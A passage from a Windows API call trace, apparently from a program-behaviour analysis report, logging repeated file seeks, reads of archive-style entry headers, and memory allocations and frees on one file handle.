lpBuffer=0x208ced0, nNumberOfBytesToRead=0x16b, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x16b, lpOverlapped=0x0) returned 1 [0114.085] malloc (_Size=0x48) returned 0x12ed3fc0 [0114.085] malloc (_Size=0x2b) returned 0x12ef4410 [0114.086] free (_Block=0x12ef43d0) [0114.086] free (_Block=0x12ed3840) [0114.088] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x333c3, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=209859) returned 1 [0114.088] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.088] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3340b, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=209931) returned 1 [0114.088] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x5bf, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x5bf, lpOverlapped=0x0) returned 1 [0114.089] malloc (_Size=0x48) returned 0x12ed3840 [0114.089] malloc (_Size=0x46) returned 0x12ef2cf0 [0114.090] free (_Block=0x12ef4410) [0114.090] free (_Block=0x12ed3fc0) [0114.091] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x339da, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=211418) returned 1 [0114.091] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.092] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x33a3d, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=211517) returned 1 [0114.092] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x116, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x116, lpOverlapped=0x0) returned 1 [0114.093] malloc (_Size=0x48) returned 0x12ef2d40 [0114.093] malloc (_Size=0x28) returned 0x12ef14a0 [0114.093] free (_Block=0x12ef2cf0) [0114.093] free (_Block=0x12ed3840) [0114.095] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x33b63, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=211811) returned 1 [0114.096] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.096] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x33ba8, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=211880) returned 1 [0114.096] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x1041, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x1041, lpOverlapped=0x0) returned 1 [0114.097] malloc (_Size=0x48) returned 0x12ef2cf0 [0114.097] malloc (_Size=0x27) returned 0x12ef13b0 [0114.128] free (_Block=0x12ef14a0) [0114.129] free (_Block=0x12ef2d40) [0114.131] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x34bf9, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=216057) returned 1 [0114.131] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.131] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x34c3d, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=216125) returned 1 [0114.132] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x67e, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x67e, lpOverlapped=0x0) returned 1 [0114.133] malloc (_Size=0x48) returned 0x12ef2d40 [0114.133] malloc (_Size=0x23) returned 0x12ef1380 [0114.135] free (_Block=0x12ef13b0) [0114.135] free (_Block=0x12ef2cf0) [0114.136] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x352cb, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=217803) returned 1 [0114.136] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.136] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3530b, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=217867) returned 1 [0114.136] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x579, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x579, lpOverlapped=0x0) returned 1 [0114.138] malloc (_Size=0x48) returned 0x12ef2cf0 [0114.138] malloc (_Size=0x2c) returned 0x12ef43d0 [0114.138] free (_Block=0x12ef1380) [0114.138] free (_Block=0x12ef2d40) [0114.151] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x35894, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=219284) returned 1 [0114.151] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.151] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x358dd, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=219357) returned 1 [0114.151] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0xa9, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0xa9, lpOverlapped=0x0) returned 1 [0114.153] malloc (_Size=0x48) returned 0x12ef2d40 [0114.153] malloc (_Size=0x23) returned 0x12ef14a0 [0114.154] free (_Block=0x12ef43d0) [0114.154] free (_Block=0x12ef2cf0) [0114.158] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x35996, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=219542) returned 1 [0114.158] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.158] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x359d6, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=219606) returned 1 [0114.158] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x44a, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x44a, lpOverlapped=0x0) returned 1 [0114.159] malloc (_Size=0x48) returned 0x12ef2cf0 [0114.159] malloc (_Size=0x48) returned 0x12ed3840 [0114.160] free (_Block=0x12ef14a0) [0114.160] free (_Block=0x12ef2d40) [0114.162] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x35e30, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=220720) returned 1 [0114.163] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.163] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x35e95, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=220821) returned 1 [0114.163] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x118, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x118, lpOverlapped=0x0) returned 1 [0114.164] malloc (_Size=0x48) returned 0x12ed3fc0 [0114.164] malloc (_Size=0x2b) returned 0x12ef4410 [0114.165] free (_Block=0x12ed3840) [0114.165] free (_Block=0x12ef2cf0) [0114.168] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x35fbd, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=221117) returned 1 [0114.168] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.168] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x36005, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=221189) returned 1 [0114.168] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x52c, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x52c, lpOverlapped=0x0) returned 1 [0114.170] malloc (_Size=0x48) returned 0x12ed3840 [0114.171] malloc (_Size=0x3d) returned 0x12ef2cf0 [0114.172] free (_Block=0x12ef4410) [0114.172] free (_Block=0x12ed3fc0) [0114.175] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x36541, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=222529) returned 1 [0114.176] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.176] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3659b, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=222619) returned 1 [0114.176] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x14b, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x14b, lpOverlapped=0x0) returned 1 [0114.177] malloc (_Size=0x48) returned 0x12ef2d40 [0114.177] malloc (_Size=0x3a) returned 0x12ed3fc0 [0114.178] free (_Block=0x12ef2cf0) [0114.178] free (_Block=0x12ed3840) [0114.181] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x366f6, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=222966) returned 1 [0114.181] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.181] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3674d, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=223053) returned 1 [0114.181] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x266, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x266, lpOverlapped=0x0) returned 1 [0114.182] malloc (_Size=0x48) returned 0x12ed3840 [0114.182] malloc (_Size=0x2b) returned 0x12ef43d0 [0114.183] free (_Block=0x12ed3fc0) [0114.183] free (_Block=0x12ef2d40) [0114.186] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x369c3, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=223683) returned 1 [0114.186] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.186] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x36a0b, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=223755) returned 1 [0114.186] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0xd07, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0xd07, lpOverlapped=0x0) returned 1 [0114.188] malloc (_Size=0x48) returned 0x12ed3fc0 [0114.188] malloc (_Size=0x2c) returned 0x12ef4410 [0114.189] free (_Block=0x12ef43d0) [0114.190] free (_Block=0x12ed3840) [0114.193] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x37722, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=227106) returned 1 [0114.193] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.193] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3776b, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=227179) returned 1 [0114.193] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x310, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x310, lpOverlapped=0x0) returned 1 [0114.194] malloc (_Size=0x48) returned 0x12ed3840 [0114.194] malloc (_Size=0x43) returned 0x12ef2cf0 [0114.195] free (_Block=0x12ef4410) [0114.195] free (_Block=0x12ed3fc0) [0114.198] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x37a8b, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=227979) returned 1 [0114.198] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.198] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x37aeb, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=228075) returned 1 [0114.198] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x135, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x135, lpOverlapped=0x0) returned 1 [0114.199] malloc (_Size=0x48) returned 0x12ef2d40 [0114.199] malloc (_Size=0xb38) returned 0x12db6970 [0114.199] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x43212, lpNewFilePointer=0x208ef10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ef10*=274962) returned 1 [0114.199] ReadFile (in: hFile=0x2d0, lpBuffer=0x12db6970, nNumberOfBytesToRead=0xb38, lpNumberOfBytesRead=0x208eee0, lpOverlapped=0x0 | out: lpBuffer=0x12db6970*, lpNumberOfBytesRead=0x208eee0*=0xb38, lpOverlapped=0x0) returned 1 [0114.200] free (_Block=0x12e09eb0) [0114.200] malloc (_Size=0x3b) returned 0x12ed3fc0 [0114.200] free (_Block=0x12ef2cf0) [0114.201] free (_Block=0x12ed3840) [0114.203] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x37c30, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=228400) returned 1 [0114.203] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.203] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x37c88, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=228488) returned 1 [0114.203] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x148, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x148, lpOverlapped=0x0) returned 1 [0114.204] malloc (_Size=0x48) returned 0x12ed3840 [0114.204] malloc (_Size=0x2b) returned 0x12ef43d0 [0114.205] free (_Block=0x12ed3fc0) [0114.206] free (_Block=0x12ef2d40) [0114.207] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x37de0, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=228832) returned 1 [0114.207] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.207] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x37e28, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=228904) returned 1 [0114.207] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0xbc3, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0xbc3, lpOverlapped=0x0) returned 1 [0114.209] malloc (_Size=0x48) returned 0x12ed3fc0 [0114.209] malloc (_Size=0x42) returned 0x12ef2cf0 [0114.209] free (_Block=0x12ef43d0) [0114.210] free (_Block=0x12ed3840) [0114.211] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x389fb, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=231931) returned 1 [0114.211] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.211] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x38a5a, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=232026) returned 1 [0114.212] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x111, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x111, lpOverlapped=0x0) returned 1 [0114.212] malloc (_Size=0x48) returned 0x12ef2d40 [0114.213] malloc (_Size=0x2d) returned 0x12ef4490 [0114.213] free (_Block=0x12ef2cf0) [0114.213] free (_Block=0x12ed3fc0) [0114.215] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x38b7b, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=232315) returned 1 [0114.215] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.215] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x38bc5, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=232389) returned 1 [0114.215] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x386, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x386, lpOverlapped=0x0) returned 1 [0114.217] malloc (_Size=0x48) returned 0x12ef2cf0 [0114.217] malloc (_Size=0x2e) returned 0x12ef43d0 [0114.218] free (_Block=0x12ef4490) [0114.218] free (_Block=0x12ef2d40) [0114.219] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x38f5b, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=233307) returned 1 [0114.219] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.220] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x38fa6, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=233382) returned 1 [0114.220] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0xd53, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0xd53, lpOverlapped=0x0) returned 1 [0114.222] malloc (_Size=0x48) returned 0x12ef2d40 [0114.222] malloc (_Size=0x28) returned 0x12ef1380 [0114.223] free (_Block=0x12ef43d0) [0114.223] free (_Block=0x12ef2cf0) [0114.224] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x39d09, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=236809) returned 1 [0114.224] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.224] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x39d4e, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=236878) returned 1 [0114.224] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0xd07, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0xd07, lpOverlapped=0x0) returned 1 [0114.225] malloc (_Size=0x48) returned 0x12ef2cf0 [0114.225] malloc (_Size=0x32) returned 0x12ef43d0 [0114.226] free (_Block=0x12ef1380) [0114.226] free (_Block=0x12ef2d40) [0114.228] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3aa65, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=240229) returned 1 [0114.228] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.228] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3aab4, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=240308) returned 1 [0114.228] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x2bb, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x2bb, lpOverlapped=0x0) returned 1 [0114.229] malloc (_Size=0x48) returned 0x12ef2d40 [0114.229] malloc (_Size=0x2c) returned 0x12ef4450 [0114.230] free (_Block=0x12ef43d0) [0114.230] free (_Block=0x12ef2cf0) [0114.232] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3ad7f, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=241023) returned 1 [0114.232] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.232] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3adc8, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=241096) returned 1 [0114.232] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x8ae, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x8ae, lpOverlapped=0x0) returned 1 [0114.233] malloc (_Size=0x48) returned 0x12ef2cf0 [0114.233] malloc (_Size=0x47) returned 0x12ed3fc0 [0114.234] free (_Block=0x12ef4450) [0114.234] free (_Block=0x12ef2d40) [0114.236] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3b686, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=243334) returned 1 [0114.236] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.236] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3b6ea, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=243434) returned 1 [0114.236] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x45f, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x45f, lpOverlapped=0x0) returned 1 [0114.237] malloc (_Size=0x48) returned 0x12ed3840 [0114.237] malloc (_Size=0x3d) returned 0x12ef2d40 [0114.238] free (_Block=0x12ed3fc0) [0114.238] free (_Block=0x12ef2cf0) [0114.240] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3bb59, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=244569) returned 1 [0114.240] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.240] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3bbb3, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=244659) returned 1 [0114.240] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x129, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: 